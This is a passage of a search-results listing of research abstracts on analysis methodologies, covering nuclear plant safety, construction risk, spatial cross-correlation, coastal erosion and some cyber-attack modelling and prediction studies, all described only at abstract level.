    The objective of this work is to determine a generic methodology for approaching the accurate identification of the root cause of component failure. Root-cause determinations are an everyday challenge to plant personnel, but they are handled with widely differing degrees of success due to the approaches, levels of diagnostic expertise, and documentation. The criterion for success is simple: If the root cause of the failure has truly been determined and corrected, the same causal failure relationship will not be demonstrated again in the future. The approach to root-cause analysis (RCA) element definition was to first selectively choose and constrain a functionally significant component (in this case a component cooling water to service water heat exchanger) that has demonstrated prevalent failures. Then a root cause of failure analysis was performed by a systems engineer on a large number of actual failure scenarios. The analytical process used by the engineer was documented and evaluated to abstract the logic model used to arrive at the root cause. For the case of the heat exchanger, the actual root-cause diagnostic approach is described. A generic methodology for the solution of the root cause of component failure is demonstrable for this general heat exchanger sample

  2. APPROPRIATE ALLOCATION OF CONTINGENCY USING RISK ANALYSIS METHODOLOGY

    Directory of Open Access Journals (Sweden)

    Andi Andi

    2004-01-01

    Full Text Available Many cost overruns in the world of construction are attributable to either unforeseen events or foreseen events for which uncertainty was not appropriately accommodated. It is argued that a significant improvement to project management performance may result from greater attention to the process of analyzing project risks. The objective of this paper is to propose a risk analysis methodology for appropriate allocation of contingency in project cost estimation. In the first step, project risks will be identified. Influence diagramming technique is employed to identify and to show how the risks affect the project cost elements and also the relationships among the risks themselves. The second step is to assess the project costs with regards to the risks under consideration. Using a linguistic approach, the degree of uncertainty of identified project risks is assessed and quantified. The problem of dependency between risks is taken into consideration during this analysis. For the final step, as the main purpose of this paper, a method for allocating appropriate contingency is presented. Two types of contingencies, i.e. project contingency and management reserve are proposed to accommodate the risks. An illustrative example is presented at the end to show the application of the methodology.

  3. The political attack ad

    Directory of Open Access Journals (Sweden)

    Palma Peña-Jiménez, Ph.D.

    2011-01-01

    Full Text Available During election campaigns the political spot has a clear objective: to win votes. This message is communicated to the electorate through television and Internet, and usually presents a negative approach, which includes a direct critical message against the opponent, rather than an exposition of proposals. This article is focused on the analysis of the campaign attack video ad purposely created to encourage the disapproval of the political opponent among voters. These ads focus on discrediting the opponent, many times, through the transmission of ad hominem messages, instead of disseminating the potential of the political party and the virtues and manifesto of its candidate. The article reviews the development of the attack ad since its first appearance, which in Spain dates back to 1996, when the famous Doberman ad was broadcast, and examines the most memorable campaign attack ads.

  4. Validating analysis methodologies used in burnup credit criticality calculations

    International Nuclear Information System (INIS)

    Brady, M.C.; Napolitano, D.G.

    1992-01-01

    The concept of allowing reactivity credit for the depleted (or burned) state of pressurized water reactor fuel in the licensing of spent fuel facilities introduces a new challenge to members of the nuclear criticality community. The primary difference in this analysis approach is the technical ability to calculate spent fuel compositions (or inventories) and to predict their effect on the system multiplication factor. Isotopic prediction codes are used routinely for in-core physics calculations and the prediction of radiation source terms for both thermal and shielding analyses, but represent an innovation for criticality specialists. This paper discusses two methodologies currently being developed to specifically evaluate isotopic composition and reactivity for the burnup credit concept. A comprehensive approach to benchmarking and validating the methods is also presented. This approach involves the analysis of commercial reactor critical data, fuel storage critical experiments, chemical assay isotopic data, and numerical benchmark calculations

  5. CONTENT ANALYSIS IN PROJECT MANAGEMENT: PROPOSALOF A METHODOLOGICAL FRAMEWORK

    Directory of Open Access Journals (Sweden)

    Alessandro Prudêncio Lukosevicius

    2016-12-01

    Full Text Available Content analysis (CA is a popular approach among researchers from different areas, but incipient in project management (PM. However, the volume of usage apparently does not translate into application quality. The method receives constant criticism about the scientific rigor adopted, especially when led by junior researchers. This article proposes a methodological framework for CA and investigate the use of CA in PM research. To accomplish this goal, literature systematic review is conjugated with CA related to 23 articles from EBSCO base in the last 20 years (1996 – 2016. The findings showed that the proposed framework can help researchers better apply the CA and suggests that the use of the method in terms of quantity and quality in PM research should be expanded. In addition to the framework, another contribution of this research is an analysis of the use of CA in PM in the last 20 years.

  6. Computer Network Operations Methodology

    Science.gov (United States)

    2004-03-01

    means of their computer information systems. Disrupt - This type of attack focuses on disrupting as “attackers might surreptitiously reprogram enemy...by reprogramming the computers that control distribution within the power grid. A disruption attack introduces disorder and inhibits the effective...between commanders. The use of methodologies is widespread and done subconsciously to assist individuals in decision making. The processes that

  7. Application of survival analysis methodology to the quantitative analysis of LC-MS proteomics data

    KAUST Repository

    Tekwe, C. D.; Carroll, R. J.; Dabney, A. R.

    2012-01-01

    positive, skewed and often left-censored, we propose using survival methodology to carry out differential expression analysis of proteins. Various standard statistical techniques including non-parametric tests such as the Kolmogorov-Smirnov and Wilcoxon

  8. Calculating Adversarial Risk from Attack Trees: Control Strength and Probabilistic Attackers

    NARCIS (Netherlands)

    Pieters, Wolter; Davarynejad, Mohsen

    2015-01-01

    Attack trees are a well-known formalism for quantitative analysis of cyber attacks consisting of multiple steps and alternative paths. It is possible to derive properties of the overall attacks from properties of individual steps, such as cost for the attacker and probability of success. However, in

  9. A Game Theoretic Approach to Cyber Attack Prediction

    Energy Technology Data Exchange (ETDEWEB)

    Peng Liu

    2005-11-28

    The area investigated by this project is cyber attack prediction. With a focus on correlation-based prediction, current attack prediction methodologies overlook the strategic nature of cyber attack-defense scenarios. As a result, current cyber attack prediction methodologies are very limited in predicting strategic behaviors of attackers in enforcing nontrivial cyber attacks such as DDoS attacks, and may result in low accuracy in correlation-based predictions. This project develops a game theoretic framework for cyber attack prediction, where an automatic game-theory-based attack prediction method is proposed. Being able to quantitatively predict the likelihood of (sequences of) attack actions, our attack prediction methodology can predict fine-grained strategic behaviors of attackers and may greatly improve the accuracy of correlation-based prediction. To our best knowledge, this project develops the first comprehensive framework for incentive-based modeling and inference of attack intent, objectives, and strategies; and this project develops the first method that can predict fine-grained strategic behaviors of attackers. The significance of this research and the benefit to the public can be demonstrated to certain extent by (a) the severe threat of cyber attacks to the critical infrastructures of the nation, including many infrastructures overseen by the Department of Energy, (b) the importance of cyber security to critical infrastructure protection, and (c) the importance of cyber attack prediction to achieving cyber security.

  10. Proposal of methodology of tsunami accident sequence analysis induced by earthquake using DQFM methodology

    International Nuclear Information System (INIS)

    Muta, Hitoshi; Muramatsu, Ken

    2017-01-01

    Since the Fukushima-Daiichi nuclear power station accident, the Japanese regulatory body has improved and upgraded the regulation of nuclear power plants, and continuous effort is required to enhance risk management in the mid- to long term. Earthquakes and tsunamis are considered as the most important risks, and the establishment of probabilistic risk assessment (PRA) methodologies for these events is a major issue of current PRA. The Nuclear Regulation Authority (NRA) addressed the PRA methodology for tsunamis induced by earthquakes, which is one of the methodologies that should be enhanced step by step for the improvement and maturity of PRA techniques. The AESJ standard for the procedure of seismic PRA for nuclear power plants in 2015 provides the basic concept of the methodology; however, details of the application to the actual plant PRA model have not been sufficiently provided. This study proposes a detailed PRA methodology for tsunamis induced by earthquakes using the DQFM methodology, which contributes to improving the safety of nuclear power plants. Furthermore, this study also states the issues which need more research. (author)

  11. Application of transient analysis methodology to heat exchanger performance monitoring

    International Nuclear Information System (INIS)

    Rampall, I.; Soler, A.I.; Singh, K.P.; Scott, B.H.

    1994-01-01

    A transient testing technique is developed to evaluate the thermal performance of industrial scale heat exchangers. A Galerkin-based numerical method with a choice of spectral basis elements to account for spatial temperature variations in heat exchangers is developed to solve the transient heat exchanger model equations. Testing a heat exchanger in the transient state may be the only viable alternative where conventional steady state testing procedures are impossible or infeasible. For example, this methodology is particularly suited to the determination of fouling levels in component cooling water system heat exchangers in nuclear power plants. The heat load on these so-called component coolers under steady state conditions is too small to permit meaningful testing. An adequate heat load develops immediately after a reactor shutdown when the exchanger inlet temperatures are highly time-dependent. The application of the analysis methodology is illustrated herein with reference to an in-situ transient testing carried out at a nuclear power plant. The method, however, is applicable to any transient testing application

  12. Methodology to analysis of aging processes of containment spray system

    International Nuclear Information System (INIS)

    Borges, D. da Silva; Lava, D.D.; Moreira, M. de L.; Ferreira Guimarães, A.C.; Fernandes da Silva, L.

    2015-01-01

    This paper presents a contribution to the study of aging process of components in commercial plants of Pressurized Water Reactors (PWRs). The motivation for write this work emerged from the current perspective nuclear. Numerous nuclear power plants worldwide have an advanced operating time. This problem requires a process to ensure the confiability of the operative systems of these plants, because of this, it is necessary a methodologies capable of estimate the failure probability of the components and systems. In addition to the safety factors involved, such methodologies can to be used to search ways to ensure the extension of the life cycle of nuclear plants, which inevitably will pass by the decommissioning process after the operating time of 40 years. This process negatively affects the power generation, besides demanding an enormous investment for such. Thus, this paper aims to present modeling techniques and sensitivity analysis, which together can generate an estimate of how components, which are more sensitive to the aging process, will behave during the normal operation cycle of a nuclear power plant. (authors)

  13. A new methodology of spatial cross-correlation analysis.

    Science.gov (United States)

    Chen, Yanguang

    2015-01-01

    Spatial correlation modeling comprises both spatial autocorrelation and spatial cross-correlation processes. The spatial autocorrelation theory has been well-developed. It is necessary to advance the method of spatial cross-correlation analysis to supplement the autocorrelation analysis. This paper presents a set of models and analytical procedures for spatial cross-correlation analysis. By analogy with Moran's index newly expressed in a spatial quadratic form, a theoretical framework is derived for geographical cross-correlation modeling. First, two sets of spatial cross-correlation coefficients are defined, including a global spatial cross-correlation coefficient and local spatial cross-correlation coefficients. Second, a pair of scatterplots of spatial cross-correlation is proposed, and the plots can be used to visually reveal the causality behind spatial systems. Based on the global cross-correlation coefficient, Pearson's correlation coefficient can be decomposed into two parts: direct correlation (partial correlation) and indirect correlation (spatial cross-correlation). As an example, the methodology is applied to the relationships between China's urbanization and economic development to illustrate how to model spatial cross-correlation phenomena. This study is an introduction to developing the theory of spatial cross-correlation, and future geographical spatial analysis might benefit from these models and indexes.

  14. A New Methodology of Spatial Cross-Correlation Analysis

    Science.gov (United States)

    Chen, Yanguang

    2015-01-01

    Spatial correlation modeling comprises both spatial autocorrelation and spatial cross-correlation processes. The spatial autocorrelation theory has been well-developed. It is necessary to advance the method of spatial cross-correlation analysis to supplement the autocorrelation analysis. This paper presents a set of models and analytical procedures for spatial cross-correlation analysis. By analogy with Moran’s index newly expressed in a spatial quadratic form, a theoretical framework is derived for geographical cross-correlation modeling. First, two sets of spatial cross-correlation coefficients are defined, including a global spatial cross-correlation coefficient and local spatial cross-correlation coefficients. Second, a pair of scatterplots of spatial cross-correlation is proposed, and the plots can be used to visually reveal the causality behind spatial systems. Based on the global cross-correlation coefficient, Pearson’s correlation coefficient can be decomposed into two parts: direct correlation (partial correlation) and indirect correlation (spatial cross-correlation). As an example, the methodology is applied to the relationships between China’s urbanization and economic development to illustrate how to model spatial cross-correlation phenomena. This study is an introduction to developing the theory of spatial cross-correlation, and future geographical spatial analysis might benefit from these models and indexes. PMID:25993120

  15. Using of BEPU methodology in a final safety analysis report

    International Nuclear Information System (INIS)

    Menzel, Francine; Sabundjian, Gaiane; D'auria, Francesco; Madeira, Alzira A.

    2015-01-01

    The Nuclear Reactor Safety (NRS) has been established since the discovery of nuclear fission, and the occurrence of accidents in Nuclear Power Plants worldwide has contributed for its improvement. The Final Safety Analysis Report (FSAR) must contain complete information concerning safety of the plant and plant site, and must be seen as a compendium of NRS. The FSAR integrates both the licensing requirements and the analytical techniques. The analytical techniques can be applied by using a realistic approach, addressing the uncertainties of the results. This work aims to show an overview of the main analytical techniques that can be applied with a Best Estimated Plus Uncertainty (BEPU) methodology, which is 'the best one can do', as well as the ALARA (As Low As Reasonably Achievable) principle. Moreover, the paper intends to demonstrate the background of the licensing process through the main licensing requirements. (author)

  16. Using of BEPU methodology in a final safety analysis report

    Energy Technology Data Exchange (ETDEWEB)

    Menzel, Francine; Sabundjian, Gaiane, E-mail: fmenzel@ipen.br, E-mail: gdjian@ipen.br [Instituto de Pesquisas Energeticas e Nucleares (IPEN/CNEN-SP), Sao Paulo, SP (Brazil); D' auria, Francesco, E-mail: f.dauria@ing.unipi.it [Universita degli Studi di Pisa, Gruppo di Ricerca Nucleare San Piero a Grado (GRNSPG), Pisa (Italy); Madeira, Alzira A., E-mail: alzira@cnen.gov.br [Comissao Nacional de Energia Nuclear (CNEN), Rio de Janeiro, RJ (Brazil)

    2015-07-01

    The Nuclear Reactor Safety (NRS) has been established since the discovery of nuclear fission, and the occurrence of accidents in Nuclear Power Plants worldwide has contributed for its improvement. The Final Safety Analysis Report (FSAR) must contain complete information concerning safety of the plant and plant site, and must be seen as a compendium of NRS. The FSAR integrates both the licensing requirements and the analytical techniques. The analytical techniques can be applied by using a realistic approach, addressing the uncertainties of the results. This work aims to show an overview of the main analytical techniques that can be applied with a Best Estimated Plus Uncertainty (BEPU) methodology, which is 'the best one can do', as well as the ALARA (As Low As Reasonably Achievable) principle. Moreover, the paper intends to demonstrate the background of the licensing process through the main licensing requirements. (author)

  17. Methodology for Modeling and Analysis of Business Processes (MMABP

    Directory of Open Access Journals (Sweden)

    Vaclav Repa

    2015-10-01

    Full Text Available This paper introduces the methodology for modeling business processes. Creation of the methodology is described in terms of the Design Science Method. Firstly, the gap in contemporary Business Process Modeling approaches is identified and general modeling principles which can fill the gap are discussed. The way which these principles have been implemented in the main features of created methodology is described. Most critical identified points of the business process modeling are process states, process hierarchy and the granularity of process description. The methodology has been evaluated by use in the real project. Using the examples from this project the main methodology features are explained together with the significant problems which have been met during the project. Concluding from these problems together with the results of the methodology evaluation the needed future development of the methodology is outlined.

  18. Application of System Dynamics Methodology in Population Analysis

    Directory of Open Access Journals (Sweden)

    August Turina

    2009-09-01

    Full Text Available The goal of this work is to present the application of system dynamics and system thinking, as well as the advantages and possible defects of this analytic approach, in order to improve the analysis of complex systems such as population and, thereby, to monitor more effectively the underlying causes of migrations. This methodology has long been present in interdisciplinary scientific circles, but its scientific contribution has not been sufficiently applied in analysis practice in Croatia. Namely, the major part of system analysis is focused on detailed complexity rather than on dynamic complexity. Generally, the science of complexity deals with emergence, innovation, learning and adaptation. Complexity is viewed according to the number of system components, or through a number of combinations that must be continually analyzed in order to understand and consequently provide adequate decisions. Simulations containing thousands of variables and complex arrays of details distract overall attention from the basic cause patterns and key inter-relations emerging and prevailing within an analyzed population. Systems thinking offers a holistic and integral perspective for observation of the world.

  19. Transuranium analysis methodologies for biological and environmental samples

    International Nuclear Information System (INIS)

    Wessman, R.A.; Lee, K.D.; Curry, B.; Leventhal, L.

    1978-01-01

    Analytical procedures for the most abundant transuranium nuclides in the environment (i.e., plutonium and, to a lesser extent, americium) are available. There is a lack of procedures for doing sequential analysis for Np, Pu, Am, and Cm in environmental samples, primarily because of current emphasis on Pu and Am. Reprocessing requirements and waste disposal connected with the fuel cycle indicate that neptunium and curium must be considered in environmental radioactive assessments. Therefore it was necessary to develop procedures that determine all four of these radionuclides in the environment. The state of the art of transuranium analysis methodology as applied to environmental samples is discussed relative to different sample sources, such as soil, vegetation, air, water, and animals. Isotope-dilution analysis with 243 Am ( 239 Np) and 236 Pu or 242 Pu radionuclide tracers is used. Americium and curium are analyzed as a group, with 243 Am as the tracer. Sequential extraction procedures employing bis(2-ethyl-hexyl)orthophosphoric acid (HDEHP) were found to result in lower yields and higher Am--Cm fractionation than ion-exchange methods

  20. Methodology for the analysis and retirement of assets: Power transformers

    Directory of Open Access Journals (Sweden)

    Gustavo Adolfo Gómez-Ramírez

    2015-09-01

    Full Text Available The following article consists of the development of a methodology of the area of the engineering of high voltage for the analysis and retirement of repaired power transformers, based on engineering criteria, in order to establish a correlation between the conditions of the transformer from several points of view: electrical, mechanical, dielectrics and thermal. Realizing an analysis of the condition of the question, there are two situations of great transcendency, first one, the international procedure are a “guide” for the acceptance of new transformers, by what they cannot be applied to the letter for repaired transformers, due to the process itself of degradation that the transformer has suffered with to happen of the years and all the factors that they were carrying to a possible repair. Second one, with base in the most recent technical literature, there have been analyzed articles, which analyze the oil dielectrics and the paper, which correlations are established between the quality of the insulating paper and the furan concentrations in the oils. To finish, great part of the investigation till now realized, it has focused in the analysis of the transformer, from the condition of the dielectric oil, so in most cases, there is not had the possibility of realizing a forensic engineering inside the transformer in operation and of being able this way, of analyzing the components of design who can compromise the integrity and operability of the same one.

  1. [Compressive-spectral analysis of EEG in patients with panic attacks in the context of different psychiatric diseases].

    Science.gov (United States)

    Tuter, N V; Gnezditskiĭ, V V

    2008-01-01

    Panic disorders (PD) which develop in the context of different psychiatric diseases (neurotic, personality disorder and schizotypal disorders) have their own clinical and neurophysiological features. The results of compressive-spectral analysis of EEG (CSA EEG) in patients with panic attack were different depending on the specifics of initial psychiatric status. EEG parameters in patients differed from those in controls. The common feature for all PD patients was the lower spectral density of theta-, alpha- and beta-bands as well as total spectral density without any alterations of region distribution. The decrease of electrical activity of activation systems was found in the groups with neurotic and schizotypal disorders and that of inhibition systems - in the group with schizotypal disorders. The EEG results did not suggest any depression of activation systems in patients with specific personality disorders. The data obtained with CSA EEG mirror the integrative brain activity which determinad of the appearance of PA as well as of nosology of psychiatre disease.

  2. Failure mode effect analysis and fault tree analysis as a combined methodology in risk management

    Science.gov (United States)

    Wessiani, N. A.; Yoshio, F.

    2018-04-01

    There have been many studies reported the implementation of Failure Mode Effect Analysis (FMEA) and Fault Tree Analysis (FTA) as a method in risk management. However, most of the studies usually only choose one of these two methods in their risk management methodology. On the other side, combining these two methods will reduce the drawbacks of each methods when implemented separately. This paper aims to combine the methodology of FMEA and FTA in assessing risk. A case study in the metal company will illustrate how this methodology can be implemented. In the case study, this combined methodology will assess the internal risks that occur in the production process. Further, those internal risks should be mitigated based on their level of risks.

  3. Supporting Space Systems Design via Systems Dependency Analysis Methodology

    Science.gov (United States)

    Guariniello, Cesare

    assess the behavior of each system based on its internal status and on the topology of its dependencies on systems connected to it. Designers and decision makers can therefore quickly analyze and explore the behavior of complex systems and evaluate different architectures under various working conditions. The methods support educated decision making both in the design and in the update process of systems architecture, reducing the need to execute extensive simulations. In particular, in the phase of concept generation and selection, the information given by the methods can be used to identify promising architectures to be further tested and improved, while discarding architectures that do not show the required level of global features. The methods, when used in conjunction with appropriate metrics, also allow for improved reliability and risk analysis, as well as for automatic scheduling and re-scheduling based on the features of the dependencies and on the accepted level of risk. This dissertation illustrates the use of the two methods in sample aerospace applications, both in the operational and in the developmental domain. The applications show how to use the developed methodology to evaluate the impact of failures, assess the criticality of systems, quantify metrics of interest, quantify the impact of delays, support informed decision making when scheduling the development of systems and evaluate the achievement of partial capabilities. A larger, well-framed case study illustrates how the Systems Operational Dependency Analysis method and the Systems Developmental Dependency Analysis method can support analysis and decision making, at the mid and high level, in the design process of architectures for the exploration of Mars. The case study also shows how the methods do not replace the classical systems engineering methodologies, but support and improve them.

  4. Stress and psychological factors before a migraine attack: A time-based analysis

    Directory of Open Access Journals (Sweden)

    Makino Mariko

    2008-09-01

    Full Text Available Abstract Background The objective of this study is to examine the stress and mood changes of Japanese subjects over the 1–3 days before a migraine headache. Methods The study participants were 16 patients with migraines who consented to participate in this study. Each subject kept a headache diary four times a day for two weeks. They evaluated the number of stressful events, daily hassles, domestic and non-domestic stress, anxiety, depressive tendency and irritability by visual analog scales. The days were classified into migraine days, pre-migraine days, buffer days and control days based on the intensity of the headaches and accompanying symptoms, and a comparative study was conducted for each factor on the migraine days, pre-migraine days and control days. Results The stressful event value of pre-migraine days showed no significant difference compared to other days. The daily hassle value of pre-migraine days was the highest and was significantly higher than that of buffer days. In non-domestic stress, values on migraine days were significantly higher than on other days, and there was no significant difference between pre-migraine days and buffer days or between pre-migraine days and control days. There was no significant difference in the values of domestic stress between the categories. In non-domestic stress, values on migraine days were significantly higher than other days, and there was no significant difference between pre-migraine days and buffer days or between pre-migraine days and control days. There was little difference in sleep quality on migraine and pre-migraine days, but other psychological factors were higher on migraine days than on pre-migraine days. Conclusion Psychosocial stress preceding the onset of migraines by several days was suggested to play an important role in the occurrence of migraines. However, stress 2–3 days before a migraine attack was not so high as it has been reported to be in the United States and

  5. The analysis of RWAP(Rod Withdrawal at Power) using the KEPRI methodology

    International Nuclear Information System (INIS)

    Yang, C. K.; Kim, Y. H.

    2001-01-01

    KEPRI developed new methodology which was based on RASP(Reactor Analysis Support Package). In this paper, The analysis of RWAP(Rod Withdrawal at Power) accident which can result in reactivity and power distribution anomaly was performed using the KEPRI methodology. The calculation describes RWAP transient and documents the analysis, including the computer code modeling assumptions and input parameters used in the analysis. To validity for the new methodology, the result of calculation was compared with FSAR. As compared with FSAR, result of the calculation using the KEPRI Methodology is similar to FSAR's. And result of the sensitivity of postulated parameters were similar to the existing methodology

  6. Temporal Cyber Attack Detection.

    Energy Technology Data Exchange (ETDEWEB)

    Ingram, Joey Burton [Sandia National Lab. (SNL-NM), Albuquerque, NM (United States); Draelos, Timothy J. [Sandia National Lab. (SNL-NM), Albuquerque, NM (United States); Galiardi, Meghan [Sandia National Lab. (SNL-NM), Albuquerque, NM (United States); Doak, Justin E. [Sandia National Lab. (SNL-NM), Albuquerque, NM (United States)

    2017-11-01

    Rigorous characterization of the performance and generalization ability of cyber defense systems is extremely difficult, making it hard to gauge uncertainty, and thus, confidence. This difficulty largely stems from a lack of labeled attack data that fully explores the potential adversarial space. Currently, performance of cyber defense systems is typically evaluated in a qualitative manner by manually inspecting the results of the system on live data and adjusting as needed. Additionally, machine learning has shown promise in deriving models that automatically learn indicators of compromise that are more robust than analyst-derived detectors. However, to generate these models, most algorithms require large amounts of labeled data (i.e., examples of attacks). Algorithms that do not require annotated data to derive models are similarly at a disadvantage, because labeled data is still necessary when evaluating performance. In this work, we explore the use of temporal generative models to learn cyber attack graph representations and automatically generate data for experimentation and evaluation. Training and evaluating cyber systems and machine learning models requires significant, annotated data, which is typically collected and labeled by hand for one-off experiments. Automatically generating such data helps derive/evaluate detection models and ensures reproducibility of results. Experimentally, we demonstrate the efficacy of generative sequence analysis techniques on learning the structure of attack graphs, based on a realistic example. These derived models can then be used to generate more data. Additionally, we provide a roadmap for future research efforts in this area.

  7. Reliability analysis for power supply system in a reprocessing facility based on GO methodology

    International Nuclear Information System (INIS)

    Wang Renze

    2014-01-01

    GO methodology was applied to analyze the reliability of power supply system in a typical reprocessing facility. Based on the fact that tie breakers are set in the system, tie breaker operator was defined. Then GO methodology modeling and quantitative analysis were performed sequently, minimal cut sets and average unavailability of the system were obtained. Parallel analysis between GO methodology and fault tree methodology was also performed. The results showed that setup of tie breakers was rational and necessary and that the modeling was much easier and the chart was much more succinct for GO methodology parallel with fault tree methodology to analyze the reliability of the power supply system. (author)

  8. Development of Human Performance Analysis and Advanced HRA Methodology

    Energy Technology Data Exchange (ETDEWEB)

    Jung, Won Dea; Park, Jin Kyun; Kim, Jae Whan; Kim, Seong Whan; Kim, Man Cheol; Ha, Je Joo

    2007-06-15

    The purpose of this project is to build a systematic framework that can evaluate the effect of human factors related problems on the safety of nuclear power plants (NPPs) as well as develop a technology that can be used to enhance human performance. The research goal of this project is twofold: (1) the development of a human performance database and a framework to enhance human performance, and (2) the analysis of human error with constructing technical basis for human reliability analysis. There are three kinds of main results of this study. The first result is the development of a human performance database, called OPERA-I/II (Operator Performance and Reliability Analysis, Part I and Part II). In addition, a standard communication protocol was developed based on OPERA to reduce human error caused from communication error in the phase of event diagnosis. Task complexity (TACOM) measure and the methodology of optimizing diagnosis procedures were also finalized during this research phase. The second main result is the development of a software, K-HRA, which is to support the standard HRA method. Finally, an advanced HRA method named as AGAPE-ET was developed by combining methods MDTA (misdiagnosis tree analysis technique) and K-HRA, which can be used to analyze EOC (errors of commission) and EOO (errors of ommission). These research results, such as OPERA-I/II, TACOM, a standard communication protocol, K-HRA and AGAPE-ET methods will be used to improve the quality of HRA and to enhance human performance in nuclear power plants.

  9. Development of Human Performance Analysis and Advanced HRA Methodology

    International Nuclear Information System (INIS)

    Jung, Won Dea; Park, Jin Kyun; Kim, Jae Whan; Kim, Seong Whan; Kim, Man Cheol; Ha, Je Joo

    2007-06-01

    The purpose of this project is to build a systematic framework that can evaluate the effect of human factors related problems on the safety of nuclear power plants (NPPs) as well as develop a technology that can be used to enhance human performance. The research goal of this project is twofold: (1) the development of a human performance database and a framework to enhance human performance, and (2) the analysis of human error with constructing technical basis for human reliability analysis. There are three kinds of main results of this study. The first result is the development of a human performance database, called OPERA-I/II (Operator Performance and Reliability Analysis, Part I and Part II). In addition, a standard communication protocol was developed based on OPERA to reduce human error caused from communication error in the phase of event diagnosis. Task complexity (TACOM) measure and the methodology of optimizing diagnosis procedures were also finalized during this research phase. The second main result is the development of a software, K-HRA, which is to support the standard HRA method. Finally, an advanced HRA method named as AGAPE-ET was developed by combining methods MDTA (misdiagnosis tree analysis technique) and K-HRA, which can be used to analyze EOC (errors of commission) and EOO (errors of ommission). These research results, such as OPERA-I/II, TACOM, a standard communication protocol, K-HRA and AGAPE-ET methods will be used to improve the quality of HRA and to enhance human performance in nuclear power plants

  10. FRACTAL ANALYSIS OF TRABECULAR BONE: A STANDARDISED METHODOLOGY

    Directory of Open Access Journals (Sweden)

    Ian Parkinson

    2011-05-01

    Full Text Available A standardised methodology for the fractal analysis of histological sections of trabecular bone has been established. A modified box counting method has been developed for use on a PC based image analyser (Quantimet 500MC, Leica Cambridge. The effect of image analyser settings, magnification, image orientation and threshold levels, was determined. Also, the range of scale over which trabecular bone is effectively fractal was determined and a method formulated to objectively calculate more than one fractal dimension from the modified Richardson plot. The results show that magnification, image orientation and threshold settings have little effect on the estimate of fractal dimension. Trabecular bone has a lower limit below which it is not fractal (λ<25 μm and the upper limit is 4250 μm. There are three distinct fractal dimensions for trabecular bone (sectional fractals, with magnitudes greater than 1.0 and less than 2.0. It has been shown that trabecular bone is effectively fractal over a defined range of scale. Also, within this range, there is more than 1 fractal dimension, describing spatial structural entities. Fractal analysis is a model independent method for describing a complex multifaceted structure, which can be adapted for the study of other biological systems. This may be at the cell, tissue or organ level and compliments conventional histomorphometric and stereological techniques.

  11. Methodological frontier in operational analysis for roundabouts: a review

    Directory of Open Access Journals (Sweden)

    Orazio Giuffre'

    2016-11-01

    Full Text Available Several studies and researches have shown that modern roundabouts are safe and effective as engineering countermeasures for traffic calming, and they are now widely used worldwide. The increasing use of roundabouts and, more recently, turbo and flower roundabouts, has induced a great variety of experiences in the field of intersection design, traffic safety and capacity modelling. As for unsignalized intersections which represent the starting point to extend knowledge about the operational analysis to roundabouts, the general situation in capacity estimation is still characterized by the discussion between gap acceptance models and empirical regression models. However, capacity modelling must contain both the analytical construction and then solution of the model, and the implementation of driver behavior. Thus, issues on a realistic modelling of driver behavior by the parameters that are included into the models are always of interest for practioners and analysts in transportation and road infrastructure engineering. Based on these considerations, this paper presents a literature review about the key methodological issues in the operational analysis of modern roundabouts. Focus is made on the aspects associated with the gap acceptance behavior, the derivation of the analytical-based models and the calculation of parameters included into the capacity equations, as well as steady state and non-steady state conditions and uncertainty in entry capacity estimation. At last, insights on future developments of the research in this field of investigation will be also outlined.

  12. Heart Attack Recovery FAQs

    Science.gov (United States)

    ... recommendations to make a full recovery. View an animation of a heart attack . Heart Attack Recovery Questions ... Support Network Popular Articles 1 Understanding Blood Pressure Readings 2 Sodium and Salt 3 Heart Attack Symptoms ...

  13. 50 Years of coastal erosion analysis: A new methodological approach.

    Science.gov (United States)

    Prieto Campos, Antonio; Diaz Cuevas, Pilar; Ojeda zujar, Jose; Guisado-Pintado, Emilia

    2017-04-01

    Coasts over the world have been subjected to increased anthropogenic pressures which combined with natural hazards impacts (storm events, rising sea-levels) have led to strong erosion problems with negative impacts on the economy and the safety of coastal communities. The Andalusian coast (South Spain) is a renowned global tourist destination. In the past decades a deep transformation in the economic model led to significant land use changes: strong regulation of rivers, urbanisation and occupation of dunes, among others. As a result irreversible transformations on the coastline, from the aggressive urbanisation undertaken, are now to be faced by local authorities and suffered by locals and visitors. Moreover, the expected impacts derived from the climate change aggravated by anthropic activities emphasises the need for tools that facilitates decision making for a sustainable coastal management. In this contribution a homogeneous (only a proxy and one photointerpreter) methodology is proposed for the calculation of coastal erosion rates of exposed beaches in Andalusia (640 km) through the use of detailed series (1:2500) of open source orthophotographies for the period (1956-1977-2001-2011). The outstanding combination of the traditional software DSAS (Digital Shoreline Analysis System) with a spatial database (PostgreSQL) which integrates the resulting erosion rates with related coastal thematic information (geomorphology, presence of engineering infrastructures, dunes and ecosystems) enhances the capacity of analysis and exploitation. Further, the homogeneity of the method used allows the comparison of the results among years in a highly diverse coast, with both Mediterranean and Atlantic façades. The novelty development and integration of a PostgreSQL/Postgis database facilitates the exploitation of the results by the user (for instance by relating calculated rates with other thematic information as geomorphology of the coast or the presence of a dune field on

  14. Compliance strategy for statistically based neutron overpower protection safety analysis methodology

    International Nuclear Information System (INIS)

    Holliday, E.; Phan, B.; Nainer, O.

    2009-01-01

    The methodology employed in the safety analysis of the slow Loss of Regulation (LOR) event in the OPG and Bruce Power CANDU reactors, referred to as Neutron Overpower Protection (NOP) analysis, is a statistically based methodology. Further enhancement to this methodology includes the use of Extreme Value Statistics (EVS) for the explicit treatment of aleatory and epistemic uncertainties, and probabilistic weighting of the initial core states. A key aspect of this enhanced NOP methodology is to demonstrate adherence, or compliance, with the analysis basis. This paper outlines a compliance strategy capable of accounting for the statistical nature of the enhanced NOP methodology. (author)

  15. A study on safety analysis methodology in spent fuel dry storage facility

    Energy Technology Data Exchange (ETDEWEB)

    Che, M. S.; Ryu, J. H.; Kang, K. M.; Cho, N. C.; Kim, M. S. [Hanyang Univ., Seoul (Korea, Republic of)

    2004-02-15

    Collection and review of the domestic and foreign technology related to spent fuel dry storage facility. Analysis of a reference system. Establishment of a framework for criticality safety analysis. Review of accident analysis methodology. Establishment of accident scenarios. Establishment of scenario analysis methodology.

  16. Modeling methodology for supply chain synthesis and disruption analysis

    Science.gov (United States)

    Wu, Teresa; Blackhurst, Jennifer

    2004-11-01

